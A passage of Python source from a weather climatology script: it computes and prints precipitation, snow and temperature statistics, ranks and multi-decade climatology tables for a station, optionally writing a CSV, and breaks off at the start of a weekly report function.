c_records["tminPROP"]["day_max"][0]: c_records["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) c_records["tminPROP"]["day_max"][1] = [] c_records["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == c_records["tminPROP"]["day_min"][0]: c_records["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < c_records["tminPROP"]["day_min"][0]: 
c_records["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) c_records["tminPROP"]["day_min"][1] = [] c_records["tminPROP"]["day_min"][1].append(clmt[y][m][d]) incr_day += datetime.timedelta(days=1) # customRank(attribute,quantity,M1,D1,*[M2,D2]) prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = customRank("temp",5,startday.month,startday.day,endday.month,endday.day,customStatsRun=True) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(len(x)) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(x) print("") print("Statistics for {}-{}-{} thru {}-{}-{}".format(startday.year,startday.month,startday.day, endday.year,endday.month,endday.day)) print("{}: {}".format(clmt["station"],clmt["station_name"])) print("Quantity of Records: {}".format(records_in_period)) print("-------------------------------------") """ c_prcp = [] c_prcpDAYS = 0 c_snow = [] c_snowDAYS = 0 c_snwd = [] c_temp = [] c_tmax = [] c_tmin = [] records_in_period = 0 c_records = {"prcpPROP":{"day_max":[-1,[]]}, "snowPROP":{"day_max":[-1,[]]}, "tempPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} """ print(" Total Precipitation: {}".format(round(sum(c_prcp),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(c_prcp),2))+1)),end="") if sum(c_prcp) > 0 and prcpdeschist.index(round(sum(c_prcp),2)) <= prcpaschist.index(round(sum(c_prcp),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(c_prcp),2))+1)),end="") try: print(", Rank: {} 
Driest".format(rank(prcpaschist.index(round(sum(c_prcp),2))+1))) if records_in_period > EXCLD and prcpaschist.index(round(sum(c_prcp),2)) <= prcpdeschist.index(round(sum(c_prcp),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(c_prcpDAYS),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(c_prcpDAYS)+1)),end="") if c_prcpDAYS > 0 and prcpDAYSdeschist.index(c_prcpDAYS) <= prcpDAYSaschist.index(c_prcpDAYS) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(c_prcpDAYS)+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(c_prcpDAYS)+1))) if records_in_period > EXCLD and prcpDAYSaschist.index(c_prcpDAYS) <= prcpDAYSdeschist.index(c_prcpDAYS) else print("") except: print("") if round(sum(c_prcp),2) > 0: print(" -- Highest Daily Precip: {}".format(c_records["prcpPROP"]["day_max"][0]),end = " ::: ") for x in c_records["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["prcpPROP"]["day_max"][1][-1] else print("{}".format(x.daystr)) if c_snowDAYS > 0: print(" Total Snow: {}".format(round(sum(c_snow),1)),end="") try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(c_snow),1))+1)),end="") if sum(c_snow) > 0 and snowdeschist.index(round(sum(c_snow),1)) <= snowaschist.index(round(sum(c_snow),1)) else print("",end="") except: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(c_snow),1))+1)),end="") try: print(", Rank: {} Least-Snowiest".format(rank(snowaschist.index(round(sum(c_snow),1))+1))) if records_in_period > EXCLD and snowaschist.index(round(sum(c_snow),1)) <= snowdeschist.index(round(sum(c_snow),1)) else print("") except: print("") print(" Total Snow Days (>=T): {}".format(c_snowDAYS),end="") try: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(c_snowDAYS)+1)),end="") if c_snowDAYS > 0 and snowDAYSdeschist.index(c_snowDAYS) <= snowDAYSaschist.index(c_snowDAYS) else 
print("",end="") except: print(", Rank: {} Most".format(rank(snowDAYSdeschist.index(c_snowDAYS)+1)),end="") try: print(", Rank: {} Least".format(rank(snowDAYSaschist.index(c_snowDAYS)+1))) if records_in_period > EXCLD and snowDAYSaschist.index(c_snowDAYS) <= snowDAYSdeschist.index(c_snowDAYS) else print("") except: print("") if c_records["snowPROP"]["day_max"][0] > 0: print("-- Snowiest Day: {}".format(c_records["snowPROP"]["day_max"][0]),end=" ::: ") for x in c_records["snowPROP"]["day_max"][1]: print("{}, ".format(x.daystr),end=" ") if x!= c_records["snowPROP"]["day_max"][1][-1] else print(x.daystr) if len(c_snwd) > 0: print(" Total Days w/Snow on the Ground: {}".format(c_snwdDAYS)) print("-- Highest Snow-Depth: {:.1f}".format(c_records["snwdPROP"]["day_max"][0]),end=" ::: ") for x in c_records["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr),end="") if x != c_records["snwdPROP"]["day_max"][1][-1] else print(x.daystr) try: print(" Average Temperature: {}".format(round(mean(c_temp),1)),end="") print(", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(c_temp),1))+1)),end="") if len(c_temp) > EXCLD*2 and tavgdeschist.index(round(mean(c_temp),1)) <= tavgaschist.index(round(mean(c_temp),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(c_temp),1))+1))) if len(c_temp) > EXCLD*2 and tavgaschist.index(round(mean(c_temp),1)) <= tavgdeschist.index(round(mean(c_temp),1)) else print("") except: print(" Average Temperature: N/A") try: print(" Avg MAX Temperature: {}".format(round(mean(c_tmax),1)),end="") print(", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(c_tmax),1))+1)),end="") if len(c_tmax) > EXCLD and tmaxdeschist.index(round(mean(c_tmax),1)) <= tmaxaschist.index(round(mean(c_tmax),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(c_tmax),1))+1))) if len(c_tmax) > EXCLD and tmaxaschist.index(round(mean(c_tmax),1)) <= 
tmaxdeschist.index(round(mean(c_tmax),1)) else print("") except: print(" Avg MAX Temperature: N/A") if c_records["tmaxPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMAX: {}".format(c_records["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in c_records["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tmaxPROP"]["day_max"][1][-1] else print(x.daystr) if c_records["tmaxPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMAX: {}".format(c_records["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in c_records["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tmaxPROP"]["day_min"][1][-1] else print(x.daystr) try: print(" Avg MIN Temperature: {}".format(round(mean(c_tmin),1)),end="") print(", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(c_tmin),1))+1)),end="") if len(c_tmin) > EXCLD and tmindeschist.index(round(mean(c_tmin),1)) <= tminaschist.index(round(mean(c_tmin),1)) else print("",end="") print(", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(c_tmin),1))+1))) if len(c_tmin) > EXCLD and tminaschist.index(round(mean(c_tmin),1)) <= tmindeschist.index(round(mean(c_tmin),1)) else print("") except: print(" Avg MIN Temperature: N/A") if c_records["tminPROP"]["day_max"][0] != -999: print(" -- Warmest Daily TMIN: {}".format(c_records["tminPROP"]["day_max"][0]),end = " ::: ") for x in c_records["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tminPROP"]["day_max"][1][-1] else print(x.daystr) if c_records["tminPROP"]["day_min"][0] != -999: print(" -- Coolest Daily TMIN: {}".format(c_records["tminPROP"]["day_min"][0]),end = " ::: ") for x in c_records["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end="") if x != c_records["tminPROP"]["day_min"][1][-1] else print(x.daystr) print("-----") print("") def dayReport(m,d,climatology=30,increment=5,output=False): """Detailed Climatological Report for a given day. 
Args (Required): m: month (int) d: day (int) Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: dayReport(5,1) -> Returns a 30-yr, 5-yr incremented climatological report for May 1st. dayReport(1,4,climatology=10) -> Returns a 10-yr,5-yr incremented climatological report for Jan 4th. dayReport(12,9,output=True) -> Returns a 30-yr,5-yr incremented climatological report for Dec 9th and outputs a CSV report of the findings. """ if len(clmt) == 0: return print("* OOPS! 
Run the clmtAnalyze function first.") valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in clmt.keys() if type(x) == int] valid_yrs.sort() climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1), "prcp": [],"prcpPROP":{"days":0,"day_max":[-1,[]]}, "snow": [],"snowPROP":{"days":0,"day_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmax": [],"tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmin": [],"tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]), "prcp": [],"prcpPROP":{"days":0,"day_max":[-1,[]]}, "snow": [],"snowPROP":{"days":0,"day_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmax": [],"tmaxPROP":{"day_max":[-999,[]],"day_min":[999,[]]}, "tmin": [],"tminPROP":{"day_max":[-999,[]],"day_min":[999,[]]}} for y in valid_yrs: if checkDate2(y,m,d): if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: alltime["prcp"].append(float(clmt[y][m][d].prcp)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": alltime["prcpPROP"]["days"] += 1 if float(clmt[y][m][d].prcp) == alltime["prcpPROP"]["day_max"][0]: alltime["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].prcp) > alltime["prcpPROP"]["day_max"][0]: alltime["prcpPROP"]["day_max"][0] = float(clmt[y][m][d].prcp) alltime["prcpPROP"]["day_max"][1] = [] alltime["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): 
climo30yrs[c]["prcp"].append(float(clmt[y][m][d].prcp)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": climo30yrs[c]["prcpPROP"]["days"] += 1 if float(clmt[y][m][d].prcp) == climo30yrs[c]["prcpPROP"]["day_max"][0]: climo30yrs[c]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].prcp) > climo30yrs[c]["prcpPROP"]["day_max"][0]: climo30yrs[c]["prcpPROP"]["day_max"][0] = float(clmt[y][m][d].prcp) climo30yrs[c]["prcpPROP"]["day_max"][1] = [] climo30yrs[c]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: alltime["snow"].append(float(clmt[y][m][d].snow)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": alltime["snowPROP"]["days"] += 1 if float(clmt[y][m][d].snow) == alltime["snowPROP"]["day_max"][0]: alltime["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].snow) > alltime["snowPROP"]["day_max"][0]: alltime["snowPROP"]["day_max"][0] = float(clmt[y][m][d].snow) alltime["snowPROP"]["day_max"][1] = [] alltime["snowPROP"]["day_max"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(float(clmt[y][m][d].snow)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": climo30yrs[c]["snowPROP"]["days"] += 1 if float(clmt[y][m][d].snow) == climo30yrs[c]["snowPROP"]["day_max"][0]: climo30yrs[c]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif float(clmt[y][m][d].snow) > climo30yrs[c]["snowPROP"]["day_max"][0]: climo30yrs[c]["snowPROP"]["day_max"][0] = float(clmt[y][m][d].snow) climo30yrs[c]["snowPROP"]["day_max"][1] = [] climo30yrs[c]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tmin not in 
["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): alltime["tempAVGlist"].append(int(clmt[y][m][d].tmax)) alltime["tempAVGlist"].append(int(clmt[y][m][d].tmin)) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == alltime["tavgPROP"]["day_max"][0]: alltime["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) > alltime["tavgPROP"]["day_max"][0]: alltime["tavgPROP"]["day_max"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) alltime["tavgPROP"]["day_max"][1] = [] alltime["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == alltime["tavgPROP"]["day_min"][0]: alltime["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) < alltime["tavgPROP"]["day_min"][0]: alltime["tavgPROP"]["day_min"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) alltime["tavgPROP"]["day_min"][1] = [] alltime["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: #if 1906 <= y <= 1915: print(y,c[0],c[1],c,y >= c[0] and y <= c[1]) if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) climo30yrs[c]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == climo30yrs[c]["tavgPROP"]["day_max"][0]: climo30yrs[c]["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) > climo30yrs[c]["tavgPROP"]["day_max"][0]: climo30yrs[c]["tavgPROP"]["day_max"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) climo30yrs[c]["tavgPROP"]["day_max"][1] = [] climo30yrs[c]["tavgPROP"]["day_max"][1].append(clmt[y][m][d]) if mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) == climo30yrs[c]["tavgPROP"]["day_min"][0]: 
climo30yrs[c]["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) elif mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) < climo30yrs[c]["tavgPROP"]["day_min"][0]: climo30yrs[c]["tavgPROP"]["day_min"][0] = mean([int(clmt[y][m][d].tmax),int(clmt[y][m][d].tmin)]) climo30yrs[c]["tavgPROP"]["day_min"][1] = [] climo30yrs[c]["tavgPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: alltime["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == alltime["tmaxPROP"]["day_max"][0]: alltime["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > alltime["tmaxPROP"]["day_max"][0]: alltime["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) alltime["tmaxPROP"]["day_max"][1] = [] alltime["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == alltime["tmaxPROP"]["day_min"][0]: alltime["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < alltime["tmaxPROP"]["day_min"][0]: alltime["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) alltime["tmaxPROP"]["day_min"][1] = [] alltime["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == climo30yrs[c]["tmaxPROP"]["day_max"][0]: climo30yrs[c]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > climo30yrs[c]["tmaxPROP"]["day_max"][0]: climo30yrs[c]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) climo30yrs[c]["tmaxPROP"]["day_max"][1] = [] climo30yrs[c]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == climo30yrs[c]["tmaxPROP"]["day_min"][0]: climo30yrs[c]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < climo30yrs[c]["tmaxPROP"]["day_min"][0]: 
climo30yrs[c]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) climo30yrs[c]["tmaxPROP"]["day_min"][1] = [] climo30yrs[c]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: alltime["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == alltime["tminPROP"]["day_max"][0]: alltime["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > alltime["tminPROP"]["day_max"][0]: alltime["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) alltime["tminPROP"]["day_max"][1] = [] alltime["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == alltime["tminPROP"]["day_min"][0]: alltime["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < alltime["tminPROP"]["day_min"][0]: alltime["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) alltime["tminPROP"]["day_min"][1] = [] alltime["tminPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: if y >= c[0] and y <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == climo30yrs[c]["tminPROP"]["day_max"][0]: climo30yrs[c]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > climo30yrs[c]["tminPROP"]["day_max"][0]: climo30yrs[c]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) climo30yrs[c]["tminPROP"]["day_max"][1] = [] climo30yrs[c]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == climo30yrs[c]["tminPROP"]["day_min"][0]: climo30yrs[c]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < climo30yrs[c]["tminPROP"]["day_min"][0]: climo30yrs[c]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) climo30yrs[c]["tminPROP"]["day_min"][1] = [] climo30yrs[c]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) for c in climo30yrs: print("tavg: ", 
c, ":", climo30yrs[c]["tempAVGlist"]) print("tmax: ", c, ":", climo30yrs[c]["tmax"]) # PRINT REPORT print("---------------------------------------------------") print("Climatology Report for {} {}".format(calendar.month_name[m],d)) print("City: {}, {}".format(clmt["station"],clmt["station_name"])) print("{}-{}; {}-Year Incremented {}-Year Climatologies".format(min(valid_yrs),max(valid_yrs),increment,climatology)) print("---------------------------------------------------") print("{:▒^9} {:▒^12} {:▒^12} {:▒^8} {:▒^9} {:▒^9} {:▒^8} {:▒^9} {:▒^9}".format("YEARS","PRCP","SNOW","TMAX","TMAX","TMAX","TMIN","TMIN","TMIN")) print("{:▒^9} {:▒^12} {:▒^12} {:▒^8} {:▒^9} {:▒^9} {:▒^8} {:▒^9} {:▒^9}".format( "","hi","hi","avg","hi","lo","avg","hi","lo")) print("{:.^9} {:.^12} {:.^12} {:.^8} {:.^9} {:.^9} {:.^8} {:.^9} {:.^9}".format("","","","","","","","","")) print("{:^9} {:>6.2f}, {:>4} {:>6.1f}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4}".format("All Time", alltime["prcpPROP"]["day_max"][0],len(alltime["prcpPROP"]["day_max"][1]) if len(alltime["prcpPROP"]["day_max"][1]) > 1 else alltime["prcpPROP"]["day_max"][1][0].daystr[0:4], alltime["snowPROP"]["day_max"][0],len(alltime["snowPROP"]["day_max"][1]) if len(alltime["snowPROP"]["day_max"][1]) > 1 else alltime["snowPROP"]["day_max"][1][0].daystr[0:4], round(mean(alltime["tmax"]),1), alltime["tmaxPROP"]["day_max"][0],len(alltime["tmaxPROP"]["day_max"][1]) if len(alltime["tmaxPROP"]["day_max"][1]) > 1 else alltime["tmaxPROP"]["day_max"][1][0].daystr[0:4], alltime["tmaxPROP"]["day_min"][0],len(alltime["tmaxPROP"]["day_min"][1]) if len(alltime["tmaxPROP"]["day_min"][1]) > 1 else alltime["tmaxPROP"]["day_min"][1][0].daystr[0:4], round(mean(alltime["tmin"]),1), alltime["tminPROP"]["day_max"][0],len(alltime["tminPROP"]["day_max"][1]) if len(alltime["tminPROP"]["day_max"][1]) > 1 else alltime["tminPROP"]["day_max"][1][0].daystr[0:4], 
alltime["tminPROP"]["day_min"][0],len(alltime["tminPROP"]["day_min"][1]) if len(alltime["tminPROP"]["day_min"][1]) > 1 else alltime["tminPROP"]["day_min"][1][0].daystr[0:4])) for c in climo30yrs: try: print("{:^9} {:>6.2f}, {:>4} {:>6.1f}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4} {:^8.1f} {:>3}, {:^4} {:>3}, {:^4}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["day_max"][0], len(climo30yrs[c]["prcpPROP"]["day_max"][1]) if len(climo30yrs[c]["prcpPROP"]["day_max"][1]) > 1 else climo30yrs[c]["prcpPROP"]["day_max"][1][0].daystr[0:4], climo30yrs[c]["snowPROP"]["day_max"][0], len(climo30yrs[c]["snowPROP"]["day_max"][1]) if len(climo30yrs[c]["snowPROP"]["day_max"][1]) > 1 else climo30yrs[c]["snowPROP"]["day_max"][1][0].daystr[0:4], round(mean(climo30yrs[c]["tmax"]),1), climo30yrs[c]["tmaxPROP"]["day_max"][0], len(climo30yrs[c]["tmaxPROP"]["day_max"][1]) if len(climo30yrs[c]["tmaxPROP"]["day_max"][1]) > 1 else climo30yrs[c]["tmaxPROP"]["day_max"][1][0].daystr[0:4], climo30yrs[c]["tmaxPROP"]["day_min"][0], len(climo30yrs[c]["tmaxPROP"]["day_min"][1]) if len(climo30yrs[c]["tmaxPROP"]["day_min"][1]) > 1 else climo30yrs[c]["tmaxPROP"]["day_min"][1][0].daystr[0:4], round(mean(climo30yrs[c]["tmin"]),1), climo30yrs[c]["tminPROP"]["day_max"][0], len(climo30yrs[c]["tminPROP"]["day_max"][1]) if len(climo30yrs[c]["tminPROP"]["day_max"][1]) > 1 else climo30yrs[c]["tminPROP"]["day_max"][1][0].daystr[0:4], climo30yrs[c]["tminPROP"]["day_min"][0], len(climo30yrs[c]["tminPROP"]["day_min"][1]) if len(climo30yrs[c]["tminPROP"]["day_min"][1]) > 1 else climo30yrs[c]["tminPROP"]["day_min"][1][0].daystr[0:4])) except: print(c) print("") if output == True: newfn = "dayReport_" + str(calendar.month_abbr[m]) + str(d) + "_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period ({} {})".format(calendar.month_abbr[m],d),"PRCP Days","PRCP stdev","PRCP 
AVG","SNOW Days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmax"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["tmin"]),1))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") try:w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") except: print(x, climo30yrs[x]["tempAVGlist"]) w.write("{:.1f}".format(round(mean(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") 
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmax"]),1))); w.write(",")
                w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",")
                w.write("{:.1f}".format(round(mean(climo30yrs[x]["tmin"]),1))); w.write("\n")
        # NOTE(review): indentation reconstructed from a whitespace-collapsed source; confirm
        # this confirmation print sits under `if output == True:` as in weekReport below.
        print("*** csv output successful ***")

def weekReport(m,d,climatology=30,increment=5,output=False):
    """Detailed Climatological Report for a given week where the given day is
    the week center (3 days prior + given day + 3 days after = 7 days).

    Args (Required):
        m: month (int)
        d: day (int)

    Keyword Args (optional):
        climatology = 30: The span of years that averages are calculated for
            (ie. '30 year climatology' or '30 year average'). This can be
            modified but should always be > the increment.
        increment = 5: Tells the script how often to assess/record successive
            climatologies. The smaller this is, the longer the report takes to
            generate. If kept at the default, for example, it would capture the
            1976-2005, 1981-2010, and 1986-2015 climatologies and so forth.
        output = False: If set to True, the script will output a CSV file of
            its findings. This could be opened in a spreadsheet program for
            further analysis

    Examples:
        weekReport(1,7) -> Returns a 30-yr, 5-yr incremented climatological
            report for the week of Jan 4 - Jan 10.
        weekReport(7,20,climatology=10) -> Returns a 10-yr, 5-yr incremented
            climatological report for the week of July 17 - July 23
        weekReport(9,6,climatology=15,increment=1,output=True) -> Returns a
            5-yr incremented, 15yr climatology report for the week of
            Sep 3 - Sep 9. It also outputs a CSV report of the findings.
    """
    # Guard: the module-level `clmt` dict must be populated first.
    if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.")
    # Contiguous span of years present in clmt (integer keys are years).
    valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1))
